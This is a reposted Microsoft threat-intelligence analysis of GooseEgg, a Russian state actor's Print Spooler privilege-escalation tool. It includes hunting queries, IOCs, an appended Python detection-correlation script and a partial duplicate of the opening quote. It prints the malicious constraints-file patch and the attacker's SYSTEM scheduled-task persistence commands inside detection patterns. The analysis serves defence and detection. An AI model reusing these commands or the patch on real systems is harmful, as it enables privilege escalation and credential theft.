Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials
<blockquote data-quote="Microsoft Threat Intelligence" data-source="post: 1084530"><p>Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russia-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38028" target="_blank">CVE-2022-38028</a> vulnerability in the Windows Print Spooler service by modifying a <a href="https://learn.microsoft.com/windows-hardware/drivers/print/javascript-constraints" target="_blank">JavaScript constraints file</a> and executing it with SYSTEM-level permissions. Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks.</p><p></p><p>Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as <a href="https://www.microsoft.com/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/" target="_blank">CVE-2023-23397</a>. 
Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the <a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">United States and United Kingdom governments</a>, Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as <a href="https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" target="_blank">Seashell Blizzard (IRIDIUM)</a> and <a href="https://www.microsoft.com/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" target="_blank">Cadet Blizzard (DEV-0586)</a>. Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527" target="_blank">CVE-2021-34527</a> and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675" target="_blank">CVE-2021-1675</a>), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028" target="_blank">CVE-2022-38028 security update</a> to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg.</p><p></p><p>This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. 
We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts.</p><p></p><h2>Who is Forest Blizzard?</h2><p></p><p>Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The <a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">United States and United Kingdom governments</a> have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities.</p><p></p><h3>GooseEgg</h3><p></p><p>Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises.</p><p></p><h4>Launch, persistence, and privilege escalation</h4><p></p><p>Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. 
GooseEgg is typically deployed with a batch script, which we have observed using the names <em>execute.bat</em> and <em>doit.bat</em>. This batch script writes the file <em>servtask.bat</em>, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run <em>servtask.bat</em>.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-1.-Batch-file-2.webp" alt="Screenshot of the batch file code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 1. Batch file</em></p><p></p><p>The GooseEgg binary—which has included but is not limited to the file names <em>justice.exe</em> and <em>DefragmentSrv.exe</em>—takes one of four commands, each with a different run path. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.</p><p></p><p>The first command issues a custom return code 0x6009F49F and exits, which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the <em>whoami</em> command.</p><p></p><p>Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “<em>wayzgoose</em>”; for example, <em>wayzgoose23.dll</em>. This DLL, as well as other components of the malware, is deployed to one of the following installation subdirectories, which is created under <em>C:\ProgramData</em>. 
A subdirectory name is selected from the list below:</p><p></p><ul> <li data-xf-list-type="ul">Microsoft</li> <li data-xf-list-type="ul">Adobe</li> <li data-xf-list-type="ul">Comms</li> <li data-xf-list-type="ul">Intel</li> <li data-xf-list-type="ul">Kaspersky Lab</li> <li data-xf-list-type="ul">Bitdefender</li> <li data-xf-list-type="ul">ESET</li> <li data-xf-list-type="ul">NVIDIA</li> <li data-xf-list-type="ul">UbiSoft</li> <li data-xf-list-type="ul">Steam</li> </ul><p></p><p>A specially crafted subdirectory with randomly generated numbers and the format string <em>\v%u.%02u.%04u</em> is also created and serves as the install directory. For example, a directory that looks like <em>C:\ProgramData\Adobe\v2.116.4405</em> may be created. The binary then copies the following driver stores to this directory:</p><p></p><ul> <li data-xf-list-type="ul"><em>C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*</em></li> <li data-xf-list-type="ul"><em>C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*</em></li> </ul><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-2.-GooseEgg-binary-adding-driver-stores-to-an-actor-controlled-directory-2.webp" alt="Screenshot of code depicting the GooseEgg binary adding driver stores to an actor-controlled directory" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 2. GooseEgg binary adding driver stores to an actor-controlled directory</em></p><p></p><p>Next, registry keys are created, effectively generating a custom protocol handler and registering a new <a href="https://learn.microsoft.com/windows/win32/com/clsid-key-hklm" target="_blank">CLSID</a> to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. 
When the Print Spooler attempts to load <em>C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js</em>, it is instead redirected to the actor-controlled directory containing the copied driver packages.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-3.-Registry-key-creation-2.webp" alt="Screenshot of the registry key creation code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 3. Registry key creation</em></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-4.-C-drive-symbolic-link-hijack-2.webp" alt="Screenshot of the C: drive symbolic link hijack code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 4. C: drive symbolic link hijack</em></p><p></p><p>The <em>MPDW-constraints.js</em> stored within the actor-controlled directory has the following patch applied to the <em>convertDevModeToPrintTicket</em> function:</p><p></p><pre>function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket)
{try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}</pre><p></p><p>The above patch to the <em>convertDevModeToPrintTicket</em> function invokes the “rogue” search protocol handler’s CLSID during the call to <em>RpcEndDocPrinter</em>. This results in the auxiliary DLL <em>wayzgoose.dll</em> launching in the context of the Print Spooler service with SYSTEM permissions. 
<em>wayzgoose.dll</em> is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.</p><p></p><h2>Recommendations</h2><p></p><p>Microsoft recommends the following mitigations to defend against attacks that use GooseEgg.</p><p></p><p><strong>Reduce the Print Spooler vulnerability</strong></p><p></p><p>Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028" target="_blank">October 11, 2022</a> and updates for PrintNightmare vulnerabilities on <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675" target="_blank">June 8, 2021</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" target="_blank">July 1, 2021</a>. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. 
To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a <a href="https://learn.microsoft.com/defender-for-identity/security-assessment-print-spooler" target="_blank">built-in security assessment</a> that tracks the availability of Print Spooler services on domain controllers.</p><p></p><p><strong>Be proactively defensive</strong></p><p></p><ul> <li data-xf-list-type="ul">For customers, follow the credential hardening recommendations in our <a href="https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport?" target="_blank">on-premises credential theft overview</a> to defend against common credential theft techniques like LSASS access.</li> <li data-xf-list-type="ul">Run <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode" target="_blank">Endpoint Detection and Response (EDR) in block mode</a> so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. </li> <li data-xf-list-type="ul">Configure <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations" target="_blank">investigation and remediation</a> in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. </li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus" target="_blank">cloud-delivered protection</a> in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. 
Cloud-based machine learning protections block a majority of new and unknown variants.</li> </ul><p></p><p>Microsoft Defender XDR customers can turn on the following <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction" target="_blank">attack surface reduction rule</a> to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.</p><p></p><ul> <li data-xf-list-type="ul"> <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem" target="_blank">Block credential stealing from the Windows local security authority subsystem (lsass.exe)</a></li> </ul><h2>Detecting, hunting, and responding to GooseEgg</h2><h3>Microsoft Defender XDR detections</h3><p></p><p><strong>Microsoft Defender Antivirus</strong></p><p></p><p>Microsoft Defender Antivirus detects threat components as the following malware:</p><p></p><ul> <li data-xf-list-type="ul">HackTool:Win64/GooseEgg</li> </ul><p></p><p><strong>Microsoft Defender for Endpoint</strong></p><p></p><p>The following alerts might also indicate threat activity related to this threat. 
Note, however, that these alerts can also be triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Possible exploitation of CVE-2021-34527</li> <li data-xf-list-type="ul">Possible source of PrintNightmare exploitation</li> <li data-xf-list-type="ul">Possible target of PrintNightmare exploitation attempt</li> <li data-xf-list-type="ul">Potential elevation of privilege using print filter pipeline service</li> <li data-xf-list-type="ul">Suspicious behavior by <em>spoolsv.exe</em></li> <li data-xf-list-type="ul">Forest Blizzard Actor activity detected</li> </ul><p></p><p><strong>Microsoft Defender for Identity</strong></p><p></p><p>The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)</li> </ul><h3>Threat intelligence reports</h3><p></p><p>Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. 
These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.</p><p></p><p><strong>Microsoft Defender Threat Intelligence</strong></p><p></p><ul> <li data-xf-list-type="ul"><a href="https://security.microsoft.com/intel-profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8?tid=72f988bf-86f1-41af-91ab-2d7cd011db47" target="_blank">Actor Profile: Forest Blizzard</a></li> <li data-xf-list-type="ul"><a href="https://security.microsoft.com/intel-explorer/articles/2005aadf?tid=72f988bf-86f1-41af-91ab-2d7cd011db47" target="_blank">Abuse of Windows Print Spooler for privilege escalation and persistence</a></li> </ul><h3>Hunting queries</h3><p></p><p><strong>Microsoft Sentinel</strong></p><p></p><p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <a href="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy" target="_blank">Discover and deploy Microsoft Sentinel out-of-the-box content from Content hub</a>.</p><p></p><p><strong>Hunt for filenames, file extensions in the ProgramData folder, and file hashes</strong></p><p></p><pre>let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);
DeviceFileEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "FileCreated"
// The batch files are dropped directly in ProgramData, but wayzgoose*.dll is staged in a
// subdirectory (e.g. C:\ProgramData\Adobe\v2.116.4405), so match the prefix, not the exact folder.
| where FolderPath startswith "C:\\ProgramData\\"
| where FileName in~ (filenames)
    or FileName endswith ".save" or FileName endswith ".zip"
    or (FileName startswith "wayzgoose" and FileName endswith ".dll")
    or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat
| project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName, InitiatingProcessAccountUpn</pre><p></p><p><strong>Hunt for processes creating or deleting the scheduled task</strong></p><p></p><pre>let gooseegg_hashes = dynamic([
    "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f", // hash value of justice.exe
    "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5"  // hash value of DefragmentSrv.exe
]);
DeviceProcessEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
// All conditions belong in one 'where': two stacked 'where' clauses, one per hash, would AND
// them together and a process can only have one hash, so that form returns nothing.
| where SHA256 in (gooseegg_hashes) or InitiatingProcessSHA256 in (gooseegg_hashes)
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
| project TimeGenerated, AccountName, AccountUpn, ActionType, DeviceId, DeviceName, FolderPath, FileName, ProcessCommandLine</pre><p></p><p><strong>Hunt for the JavaScript constraints file</strong></p><p></p><pre>DeviceFileEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "FileCreated"
| where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
// Legitimate print driver package installs also write .js files here; pivot on the writing process and timing.
| where FileName endswith ".js" or FileName =~ "MPDW-constraints.js"</pre><p></p><p><strong>Hunt for creation of registry key / value events</strong></p><p></p><pre>DeviceRegistryEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
| where RegistryValueName has "(Default)"
| where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"</pre><p></p><p><strong>Hunt for the custom protocol handler</strong></p><p></p><pre>DeviceRegistryEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"
| where RegistryValueName has "CLSID"
| where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"</pre><h3>Indicators of compromise</h3><p></p><p><strong>Batch script artifacts:</strong></p><p></p><ul> <li data-xf-list-type="ul"><em>execute.bat</em></li> <li data-xf-list-type="ul"><em>doit.bat</em></li> <li data-xf-list-type="ul"><em>servtask.bat</em></li> <li data-xf-list-type="ul">7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9</li> </ul><p></p><p><strong>GooseEgg artifacts:</strong></p><p></p><ul> <li data-xf-list-type="ul"><em>justice.pdb</em></li> <li data-xf-list-type="ul"><em>wayzgoose.pdb</em></li> </ul> <table style='width: 100%'><tr><td><strong>Indicator</strong></td><td><strong>Type</strong></td><td><strong>Description</strong></td></tr><tr><td>c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5</td><td>SHA-256</td><td>Hash of GooseEgg binary <em>DefragmentSrv.exe</em></td></tr><tr><td>6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f</td><td>SHA-256</td><td>Hash of GooseEgg binary <em>justice.exe</em></td></tr><tr><td>41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa</td><td>SHA-256</td><td>Hash of <em>wayzgoose[%n].dll</em> – where %n is a random number</td></tr></table><h3>References</h3> <ul> <li data-xf-list-type="ul"><a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF</a></li> <li data-xf-list-type="ul"><a 
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527" target="_blank">CVE - CVE-2021-34527</a></li> <li data-xf-list-type="ul"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675" target="_blank">CVE - CVE-2021-1675</a></li> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a" target="_blank">Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability | CISA</a></li> </ul><h3>Learn more</h3><p></p><p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <a href="https://aka.ms/threatintelblog" target="_blank">Threat intelligence | Microsoft Security Blog</a>.</p><p></p><p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href="https://www.linkedin.com/showcase/microsoft-threat-intelligence" target="_blank">Microsoft Threat Intelligence | LinkedIn</a>, and on X (formerly Twitter) at <a href="https://twitter.com/MsftSecIntel" target="_blank">https://twitter.com/MsftSecIntel</a>.</p><p></p><p>To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href="https://thecyberwire.com/podcasts/microsoft-threat-intelligence" target="_blank">https://thecyberwire.com/podcasts/microsoft-threat-intelligence</a>.</p><p></p><p>The post <a href="https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/" target="_blank">Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog" target="_blank">Microsoft Security 
Blog</a>.</p></blockquote><p></p>
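The stages the quoted post describes (batch dropper in ProgramData, the `\v%u.%02u.%04u` install directory under a decoy vendor folder, the `\Microsoft\Windows\WinSrv` scheduled task, the `rogue` protocol handler and its CLSID, and the patched constraints file) map directly onto the hunting queries above, but each query runs on its own. The script below is an added example, not Microsoft's code and not part of the original post: it reimplements those rules in Python over constructed telemetry records and correlates the hits per device, so that a single noisy stage (a driver package writing `MPDW-constraints.js`) is only flagged for review while a chain of stages produces a verdict. Field names are shaped like Defender's `DeviceFileEvents`, `DeviceProcessEvents` and `DeviceRegistryEvents`, but every record in `SAMPLE_EVENTS` is hand-written for this example; the stage names, the `spoolsv.exe`-child rule and the verdict thresholds are this example's own assumptions.

```python
"""
Correlating the GooseEgg stages described in the post over endpoint telemetry.

Added example, not Microsoft's code. Records mimic Defender table field names,
but SAMPLE_EVENTS is constructed for this example. The stage names, the
spoolsv-child rule and the verdict thresholds are assumptions of this example.
"""
import re
from collections import defaultdict

# Indicators taken from the post's IOC table and hunting queries.
GOOSEEGG_SHA256 = {
    "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9",  # execute.bat / doit.bat / servtask.bat
    "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f",  # justice.exe
    "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5",  # DefragmentSrv.exe
    "41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa",  # wayzgoose[%n].dll
}
BATCH_NAMES = {"execute.bat", "doit.bat", "servtask.bat"}
ROGUE_CLSID = "{026cc6d7-34b2-33d5-b551-ca31eb6ce345}"
TASK_NAME = "\\microsoft\\windows\\winsrv"
PROGRAMDATA = "c:\\programdata\\"
DRIVERSTORE = "c:\\windows\\system32\\driverstore\\filerepository\\"

# Install directory: C:\ProgramData\<decoy vendor>\v%u.%02u.%04u\  (%02u / %04u are minimum widths)
INSTALL_DIR = re.compile(
    r"^c:\\programdata\\(microsoft|adobe|comms|intel|kaspersky lab|bitdefender|eset|nvidia|ubisoft|steam)"
    r"\\v\d+\.\d{2,}\.\d{4,}\\", re.IGNORECASE)
WAYZGOOSE_DLL = re.compile(r"^wayzgoose\d*\.dll$", re.IGNORECASE)
ROGUE_PROTOCOL = re.compile(r"\\software\\classes\\protocols\\handler\\rogue$", re.IGNORECASE)


def stage_for(ev):
    """Return the GooseEgg stage a single telemetry record evidences, or None."""
    if ev.get("SHA256") in GOOSEEGG_SHA256 or ev.get("InitiatingProcessSHA256") in GOOSEEGG_SHA256:
        return "known_hash"
    table = ev["Table"]
    if table == "DeviceFileEvents":
        name, folder = ev["FileName"].lower(), ev["FolderPath"].lower()
        if folder.startswith(PROGRAMDATA) and name in BATCH_NAMES:
            return "batch_dropper"
        if WAYZGOOSE_DLL.match(name) or INSTALL_DIR.match(folder):
            return "staged_install_dir"
        if folder.startswith(DRIVERSTORE) and name == "mpdw-constraints.js":
            return "constraints_js_write"  # weak on its own: driver package installs write here too
    elif table == "DeviceProcessEvents":
        cmd = ev.get("ProcessCommandLine", "").lower()
        if "schtasks" in cmd and TASK_NAME in cmd:
            return "winsrv_task"
        # The fourth GooseEgg command verifies the exploit with whoami; the observable side effect
        # is the SYSTEM spooler spawning whoami or a shell (rule is an assumption of this example).
        if (ev.get("InitiatingProcessFileName", "").lower() == "spoolsv.exe"
                and ev["FileName"].lower() in {"cmd.exe", "whoami.exe"}):
            return "spoolsv_child"
    elif table == "DeviceRegistryEvents":
        key = ev["RegistryKey"].lower()
        if ROGUE_PROTOCOL.search(key) or ROGUE_CLSID in key:
            return "rogue_com_handler"
    return None


# Stages that justify an alert alone; the others only count in combination.
HIGH_CONFIDENCE = {"known_hash", "rogue_com_handler", "winsrv_task"}


def correlate(events):
    """Group matched stages per device and assign a verdict: (verdict, sorted stage names)."""
    stages_by_device = defaultdict(set)
    for ev in events:
        stage = stage_for(ev)
        if stage:
            stages_by_device[ev["DeviceName"]].add(stage)
    verdicts = {}
    for device, stages in stages_by_device.items():
        verdict = "gooseegg_suspected" if (stages & HIGH_CONFIDENCE or len(stages) >= 2) else "review"
        verdicts[device] = (verdict, sorted(stages))
    return verdicts


# Constructed sample telemetry: ws01 shows the full chain, print01 a lone driver-package write,
# ws02 an unrelated vendor directory that must not match the install-directory pattern.
SAMPLE_EVENTS = [
    {"Table": "DeviceFileEvents", "DeviceName": "ws01", "FolderPath": "C:\\ProgramData\\", "FileName": "execute.bat"},
    {"Table": "DeviceProcessEvents", "DeviceName": "ws01", "FileName": "schtasks.exe",
     "ProcessCommandLine": "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"},
    {"Table": "DeviceFileEvents", "DeviceName": "ws01", "FolderPath": "C:\\ProgramData\\Adobe\\v2.116.4405\\", "FileName": "wayzgoose23.dll"},
    {"Table": "DeviceRegistryEvents", "DeviceName": "ws01",
     "RegistryKey": "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue", "RegistryValueName": "CLSID"},
    {"Table": "DeviceProcessEvents", "DeviceName": "ws01", "FileName": "whoami.exe", "InitiatingProcessFileName": "spoolsv.exe"},
    {"Table": "DeviceFileEvents", "DeviceName": "print01",
     "FolderPath": "C:\\Windows\\System32\\DriverStore\\FileRepository\\pnms009.inf_amd64_a7412a554c9bc1fd\\",
     "FileName": "MPDW-constraints.js"},
    {"Table": "DeviceFileEvents", "DeviceName": "ws02", "FolderPath": "C:\\ProgramData\\Adobe\\ARM\\S\\", "FileName": "AdobeARM.log"},
]

if __name__ == "__main__":
    for device, (verdict, stages) in sorted(correlate(SAMPLE_EVENTS).items()):
        print(f"{device}: {verdict} {stages}")
```

Run as-is, the script reports `ws01` as `gooseegg_suspected` with all five stages, `print01` as `review` with only the constraints-file write, and nothing for `ws02`. The version-directory regex uses `\d{2,}` and `\d{4,}` rather than exact widths because `%02u` and `%04u` are minimum field widths in printf formatting, so larger random numbers would otherwise slip past the pattern.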
[QUOTE="Microsoft Threat Intelligence, post: 1084530"] Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the [URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38028']CVE-2022-38028[/URL] vulnerability in Windows Print Spooler service by modifying a [URL='https://learn.microsoft.com/windows-hardware/drivers/print/javascript-constraints']JavaScript constraints file[/URL] and executing it with SYSTEM-level permissions. Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks. Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as [URL='https://www.microsoft.com/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/']CVE-2023-23397[/URL]. 
